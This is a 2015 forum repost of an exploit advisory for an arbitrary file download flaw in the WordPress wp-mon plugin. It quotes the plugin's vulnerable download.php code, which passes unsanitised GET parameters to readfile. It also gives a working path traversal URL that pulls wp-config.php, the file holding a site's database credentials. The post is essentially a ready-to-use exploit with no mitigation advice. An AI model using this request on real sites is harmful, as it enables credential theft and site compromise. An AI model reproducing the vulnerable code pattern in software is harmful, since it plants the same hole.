KhiZaRix Posted April 20, 2015 Report Share Posted April 20, 2015 |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------------------------------------------------------------| | [+] Exploit Title:Wordpress wp-mon Plugin Arbitrary File Download Vulnerability | | [+] Exploit Author: Ashiyane Digital Security Team | | [+] Vendor Homepage : https://wordpress.org/plugins/wp-mon/ | [+] Download Link : https://downloads.wordpress.org/plugin/wp-mon.zip | [+] Tested on : Windows,Linux | | [+] Date : 2015-04-16 | [+] Discovered By : ACC3SS |-------------------------------------------------------------------------| | [+] Exploit: | | [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/wp-mon/assets/download.php | | [+] Vulnerable Code :<?php header( 'Content-Type: ' . $_GET['type'] ); header( 'Content-Disposition: attachment; filename="' . $_GET['name'] . '"' ); readfile( $_GET['path'] . DIRECTORY_SEPARATOR . $_GET['name'] );?> | [+] http://localhost/wordpress/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=[File Address]&name=[File Name] | [+] | [+] Examples : http://localhost/wordpress/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php |-------------------------------------------------------------------------||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|Source: http://packetstorm.wowhacker.com/1504-exploits/wpmon-disclose.txt Quote Link to comment Share on other sites More sharing options...
.thumb.jpg.29b1f7ae7dd9ad5a11e41a710722ba35.jpg)